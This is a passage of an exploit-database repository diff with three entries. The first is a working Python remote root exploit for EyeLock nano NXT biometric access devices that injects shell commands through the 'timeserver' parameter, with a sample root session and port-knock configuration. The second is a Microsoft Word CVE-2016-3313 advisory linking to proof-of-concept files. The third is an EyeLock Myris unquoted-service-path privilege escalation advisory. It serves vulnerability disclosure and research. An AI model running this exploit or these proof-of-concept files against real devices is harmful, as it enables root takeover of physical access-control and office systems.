# ideal replacement for card-based systems, and seamlessly controls access to turnstiles,
|
||||
# secured entrances, server rooms and any other physical space. Similarly the device
|
||||
# is powerful and compact enough to secure high-value transactions, critical databases,
|
||||
# network workstations or any other information system.
|
||||
#
|
||||
# Desc: EyeLock's nano NXT firmware latest version 3.5 (released 25.07.2016) suffers
|
||||
# from multiple unauthenticated command injection vulnerabilities. The issue lies
|
||||
# within the 'rpc.php' script located in the '/scripts' directory and can be triggered
|
||||
# when user supplied input is not correctly sanitized while updating the local time for
|
||||
# the device and/or get info from remote time server. The vulnerable script has two REQUEST
|
||||
# parameters 'timeserver' and 'localtime' that are called within a shell_exec() function
|
||||
# for setting the local time and the hardware clock of the device. An attacker can exploit
|
||||
# these conditions gaining full system (root) access and execute OS commands on the affected
|
||||
# device by injecting special characters to the affected parameters and further bypass
|
||||
# the access control in place.
|
||||
#
|
||||
# Hint: Plenty other RCE bugs are present in the rpc.php and others (like: uploadCertificate.php,
|
||||
# upgrade.php, WebConfig.php, firmwareupdate.php, interfaceeditor.php, etc.)
|
||||
#
|
||||
# =============================================================================
|
||||
# /scripts/rpc.php:
|
||||
# -----------------
|
||||
# 9: if (isset($_REQUEST['action']))
|
||||
# 10: {
|
||||
# 11: switch($_REQUEST['action'])
|
||||
# ...
|
||||
# ...
|
||||
# 181: case 'updatetime':
|
||||
# 182: {
|
||||
# 183: // do something, the put our response in the response field...
|
||||
# 184: $strDate = shell_exec("rdate -s {$_REQUEST['timeserver']} 2>&1");
|
||||
# 185:
|
||||
# 186: // set the hardware clock.
|
||||
# 187: $strResult = shell_exec("/sbin/hwclock -w"); // Does no harm to call this even on failure...
|
||||
# 188:
|
||||
# 189: $strtheDate = shell_exec("date 2>&1");
|
||||
# 190:
|
||||
# 191: echo "updatetime|{$strDate}|{$strtheDate}";
|
||||
# 192:
|
||||
# 193: break;
|
||||
# 194: }
|
||||
# 195:
|
||||
# 196: case 'updatelocaltime':
|
||||
# 197: {
|
||||
# 198: // do something, the put our response in the response field...
|
||||
# 199: $strDate = shell_exec("date -s '{$_REQUEST['localtime']}' 2>&1");
|
||||
# 200:
|
||||
# 201: // set the hardware clock
|
||||
# 202: $strResult = shell_exec("/sbin/hwclock -w"); // Does no harm to call this even on failure...
|
||||
# 203:
|
||||
# 204: $strtheDate = shell_exec("date 2>&1");
|
||||
# 205:
|
||||
# 206: echo "updatelocaltime|{$strDate}|{$strtheDate}";
|
||||
# 207:
|
||||
# 208: break;
|
||||
# 209: }
|
||||
# =============================================================================
|
||||
#
|
||||
# -----------------------------------------------------------------------------
|
||||
# Master: 192.168.40.1
|
||||
# Slave: 192.168.40.2
|
||||
#
|
||||
# $ eyelock.py 192.168.40.1
|
||||
#
|
||||
# root@192.168.40.1:~# id
|
||||
# uid=0(root) gid=0(root)
|
||||
#
|
||||
# root@192.168.40.1:~# cat /home/root/knockd.conf
|
||||
# [options]
|
||||
# logfile = /var/log/knockd.log
|
||||
#
|
||||
# [openSSH]
|
||||
# sequence = 1973,1975,2013
|
||||
# seq_timeout = 15
|
||||
# command = /usr/sbin/iptables -D INPUT -p tcp --dport 22 -j DROP
|
||||
# tcpflags = syn
|
||||
#
|
||||
# [closeSSH]
|
||||
# sequence = 91,85,70
|
||||
# seq_timeout = 5
|
||||
# command = /usr/sbin/iptables -A INPUT -p tcp --dport 22 -j DROP
|
||||
# tcpflags = syn
|
||||
#
|
||||
#
|
||||
# root@192.168.40.1:~# exit
|
||||
#
|
||||
# $
|
||||
# -----------------------------------------------------------------------------
|
||||
#
|
||||
#
|
||||
# Tested on: GNU/Linux (armv7l)
|
||||
# lighttpd/1.4.35
|
||||
# SQLite/3.8.7.2
|
||||
# PHP/5.6.6
|
||||
#
|
||||
#
|
||||
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
# @zeroscience
|
||||
#
|
||||
#
|
||||
# Advisory ID: ZSL-2016-5357
|
||||
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5357.php
|
||||
#
|
||||
#
|
||||
# 10.06.2016
|
||||
#
|
||||
|
||||
import re,sys,os
|
||||
import requests
|
||||
|
||||
piton = os.path.basename(sys.argv[0])
|
||||
|
||||
print '''
|
||||
---------------------------------------------------------
|
||||
EyeLock nano NXT <=3.5 [Open Sesame] Remote Root Exploit
|
||||
|
||||
Zero Science Lab - http://zeroscience.mk
|
||||
ZSL-2016-5357
|
||||
|
||||
---------------------------------------------------------
|
||||
'''
|
||||
|
||||
if len(sys.argv) < 2:
|
||||
print '\n\x20\x20[*] Usage: '+piton+' <ipaddress>\n'
|
||||
sys.exit()
|
||||
|
||||
ipaddr = sys.argv[1]
|
||||
|
||||
print
|
||||
while True:
|
||||
try:
|
||||
cmd = raw_input('root@'+ipaddr+':~# ')
|
||||
# http://EyelockNxtMasterIP/scripts/rpc.php?action=updatelocaltime&localtime=%26whoami%26
|
||||
execute = requests.get('http://'+ipaddr+'/scripts/rpc.php?action=updatetime×erver=||'+cmd)
|
||||
pattern = re.compile(r'updatetime\|(.*?)\|',re.S|re.M)
|
||||
cmdout = pattern.match(execute.text)
|
||||
print cmdout.groups()[0].strip()
|
||||
print
|
||||
if cmd.strip() == 'exit':
|
||||
break
|
||||
except Exception:
|
||||
break
|
||||
|
||||
sys.exit()
|
59
platforms/windows/dos/40224.txt
Executable file
59
platforms/windows/dos/40224.txt
Executable file
|
@ -0,0 +1,59 @@
|
|||
#####################################################################################
|
||||
|
||||
# Application: Microsoft Office Word
|
||||
# Platforms: Windows, OSX
|
||||
# Versions: Microsoft Office Word 2007,2010,2013,2016
|
||||
# Author: Sébastien Morin of COSIG
|
||||
# Website: https://cosig.gouv.qc.ca/en/advisory/
|
||||
# Twitter: @SebMorin1, @COSIG_
|
||||
# Date: August 09, 2016
|
||||
# CVE: CVE-2016-3313
|
||||
# COSIG-2016-31
|
||||
|
||||
#####################################################################################
|
||||
|
||||
1) Introduction
|
||||
2) Report Timeline
|
||||
3) Technical details
|
||||
4) POC
|
||||
|
||||
#######################################################################################
|
||||
|
||||
===================
|
||||
1) Introduction
|
||||
===================
|
||||
|
||||
Microsoft Word is a word processor developed by Microsoft. It was first released on October 25, 1983[3] under the name Multi-Tool Word for Xenix systems.[4][5][6] Subsequent versions were later written for several other platforms including IBM PCs running DOS (1983), Apple Macintosh running Mac OS (1985), AT&T Unix PC (1985), Atari ST (1988), OS/2 (1989), Microsoft Windows (1989) and SCO Unix (1994). Commercial versions of Word are licensed as a standalone product or as a component of Microsoft Office, Windows RT or the discontinued Microsoft Works suite. Microsoft Word Viewer and Office Online are Freeware editions of Word with limited features.
|
||||
|
||||
(https://en.wikipedia.org/wiki/Microsoft_Word)
|
||||
|
||||
#######################################################################################
|
||||
|
||||
===================
|
||||
2) Report Timeline
|
||||
===================
|
||||
|
||||
2016-05-15: Sébastien Morin of COSIG report the vulnerability to MSRC.
|
||||
2016-06-07: MSRC confirm the vulnerability
|
||||
2016-08-09: Microsoft fixed the issue (MS16-099).
|
||||
2016-08-09: Advisory released.
|
||||
|
||||
#######################################################################################
|
||||
|
||||
===================
|
||||
3) Technical details
|
||||
===================
|
||||
|
||||
This vulnerability allow remote code execution if a user opens a specially crafted Microsoft Office Word (.doc) with an invalid WordDocumentStream.
|
||||
An attacker who successfully exploited the vulnerabilities could run arbitrary code in the context of the current user.
|
||||
|
||||
#######################################################################################
|
||||
|
||||
==========
|
||||
4) POC
|
||||
==========
|
||||
|
||||
https://smsecurity.net/wp-content/uploads/2016/08/COSIG-2016-31.doc
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40224.zip
|
||||
|
||||
#######################################################################################
|
54
platforms/windows/local/40226.txt
Executable file
54
platforms/windows/local/40226.txt
Executable file
|
@ -0,0 +1,54 @@
|
|||
EyeLock Myris 3.3.2 SDK Service Unquoted Service Path Privilege Escalation
|
||||
|
||||
|
||||
Vendor: EyeLock, LLC
|
||||
Product web page: http://www.eyelock.com
|
||||
Affected version: 3.3.21289.1311
|
||||
|
||||
Summary: myris® provides unparalleled security, is portable, lightweight
|
||||
and is as easy as looking in a mirror. Use myris to quickly and easily
|
||||
enroll users for EyeLock’s access control products or to grant users
|
||||
access to corporate domain environments within seconds—users never have
|
||||
to type their username and password again.
|
||||
|
||||
Desc: The application suffers from an unquoted search path issue impacting
|
||||
the service 'MyrisService' for Windows deployed as part of Myris solution.
|
||||
This could potentially allow an authorized but non-privileged local user to
|
||||
execute arbitrary code with elevated privileges on the system. A successful
|
||||
attempt would require the local user to be able to insert their code in the
|
||||
system root path undetected by the OS or other security applications where
|
||||
it could potentially be executed during application startup or reboot. If
|
||||
successful, the local user’s code would execute with the elevated privileges
|
||||
of the application.
|
||||
|
||||
Tested on: Microsoft Windows 7 Professional SP1 (EN)
|
||||
Microsoft Windows 7 Ultimate SP1 (EN)
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2016-5355
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5355.php
|
||||
|
||||
|
||||
10.06.2016
|
||||
|
||||
--
|
||||
|
||||
|
||||
C:\Users\joxy>sc qc MyrisService
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: MyrisService
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files (x86)\Eyelock Corporation\MyrisSDK\bin\MyrisService.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : Myris SDK Service
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
Loading…
Add table
Reference in a new issue